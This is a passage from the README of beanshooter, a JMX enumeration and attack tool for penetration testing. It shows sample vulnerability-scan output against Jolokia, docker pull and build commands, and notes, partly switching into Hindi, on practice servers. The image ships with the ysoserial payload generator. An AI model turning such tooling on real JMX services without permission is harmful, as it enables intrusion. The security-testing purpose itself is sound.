[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking whether Jolokia Proxy Mode is enabled:
[+]
[+] - Jolokia Proxy Mode is enabled! You may connect to backend JMX services.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+] - 75 MBeans are currently registred on the MBean server.
[+] Listing 56 non default MBeans:
...
Due to the limited feature set of Jolokia, not all beanshooter operations are supported. Please
consult the Jolokia FAQ if you have any questions. For playing around with
Jolokia, beanshooter provides an example server
that exposes an Jolokia endpoint on port 8080. Additionally, a regular RMI based JMX endpoint
can be found on port 1090.
Since version v3.1.1, beanshooter is also available as docker image and can be pulled from the
GitHub Container Registry.
For each release, there is a normal and a slim version available. Both provide a full working version of
beanshooter, but only the normal version ships with ysoserial
included, resulting in a larger image size:
docker pull ghcr.io/qtc-de/beanshooter/beanshooter:4.1.0 - 124MBdocker pull ghcr.io/qtc-de/beanshooter/beanshooter:4.1.0-slim - 64.8MBYou can also build the container on your own by running the following commands:```console [user@host ~]$ git clone https://github.com/qtc-de/beanshooter [user@host ~]$ cd beanshooter && docker build -t beanshooter .
### उदाहरण सर्वर
---


ऊपर प्रस्तुत अधिकांश उदाहरण [jmx-example-server](https://github.com/qtc-de/beanshooter/pkgs/container/beanshooter%2Fjmx-example-server)
और [tomcat-example-server](https://github.com/qtc-de/beanshooter/pkgs/container/beanshooter%2Ftomcat-example-server) पर आधारित हैं।
ये सर्वर इस रिपॉजिटरी के [docker](https://github.com/qtc-de/beanshooter/blob/HEAD/docker) फ़ोल्डर में शामिल हैं और इनका उपयोग *JMX* गणना का अभ्यास करने के लिए किया जा सकता है।
आप स्वयं संबंधित कंटेनर बना सकते हैं या उन्हें सीधे *GitHub Container Registry* से लोड कर सकते हैं।
कॉपीराइट 2023, Tobias Neitzel और *beanshooter* योगदानकर्ता।